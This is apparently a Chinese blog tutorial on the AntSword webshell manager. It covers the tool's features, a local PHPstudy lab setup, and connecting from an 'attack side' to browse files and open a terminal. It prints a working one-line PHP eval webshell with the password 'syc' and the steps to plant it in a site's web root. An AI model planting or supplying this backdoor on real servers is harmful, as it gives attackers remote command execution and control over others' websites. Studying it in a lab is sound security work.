蚁剑的使用之一句话木马

介绍：

中国蚁剑（antSword）是一款开源的跨平台网站管理工具，以下是对其的详细介绍：

一、项目背景与定位

• 项目地址：GitCode - 全球开发者的开源社区,开源代码托管平台
• 定位：中国蚁剑旨在为渗透测试人员、安全研究人员以及网站管理员提供一个强大的工具集。它主要面向合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

二、技术栈与特性

• 技术栈：中国蚁剑主要使用JavaScript作为编程语言，结合了Electron、ES6、dhtmlx、Node.js等技术栈。
• 跨平台支持：基于Electron框架开发，支持Windows、Linux、macOS等多个操作系统，确保用户在不同环境下都能高效使用。
• 模块化设计：采用模块化设计思路，方便用户理解和修改代码，同时也鼓励社区贡献。
• 性能优化：对核心功能进行了性能优化，提升了工具的响应速度和稳定性。
• 用户界面：优化了用户界面，提升了用户体验，使得操作更加直观和便捷。

三、功能与应用

• 全面的网站管理功能：提供文件管理、数据库管理、命令执行等全面的网站管理功能。
• 广泛的应用场景：无论是进行合法的渗透测试，还是日常的网站管理，中国蚁剑都能提供强大的支持。对于渗透测试安全人员来说，中国蚁剑可以帮助他们快速发现网站的漏洞，并进行有效的测试。对于网站管理员来说，中国蚁剑提供了一系列的管理工具，极大地提高了工作效率。

四、安全合规与社区支持

• 安全合规：严格遵守开源协议，禁止任何非法用途和未经授权的修改发布。同时，中国蚁剑还加强了工具的安全性，修复了已知的安全漏洞，确保用户数据的安全。
• 社区支持：拥有活跃的社区和贡献者，不断推动项目的进步和发展。中国蚁剑不仅是一款工具，更是一个社区、一个平台，让每个用户都能在这里找到属于自己的价值。

五、使用与下载

• 使用：用户可以通过官网或GitHub页面下载中国蚁剑的源代码或压缩包，并根据自己的需求进行安装和使用。同时，中国蚁剑还提供了详细的文档和教程，帮助用户快速上手。
• 下载：用户可以通过访问中国蚁剑的项目地址或相关下载页面，选择适合自己的系统版本进行下载。

综上所述，中国蚁剑作为一款开源的跨平台网站管理工具，凭借其强大的功能和活跃的社区支持，已经成为安全研究人员和渗透测试人员的首选工具之一。

实践：

环境的搭建：

打开PHPstudy，新建网站

 回到主页点击shell的管理，打开网站。

如图所示，即为连接成功。

 

 现在服务端就配置成功了。

查看主机ip

在命令行窗口cmd中输入 ipconfig,即可查看。

 在windows中成功连接网站。

创建PHP文件

 打开网站的根目录。

新建txt文件，输入一句话木马，保存。

 <?php @eval($_POST['syc']);?>

 其中，syc就是你用来控制的密码，可以随便取。

 将后缀改为.php即可。如图：

 

蚁剑的使用：

回到攻击端，打开蚁剑，右键空白区域，选择添加数据。然后输入一句话木马位置，和连接的密码，编码方式随便。点击测试连接，显示连接成功说明一句话木马可用。

然后点添加就可以添加到目录了。 

双击即可查看对方目录。

 

还可以右键目标打开终端，输入命令。

还可以进行文件管理、打开虚拟终端、数据操作等。接下来的探索就看大家自己发挥啦！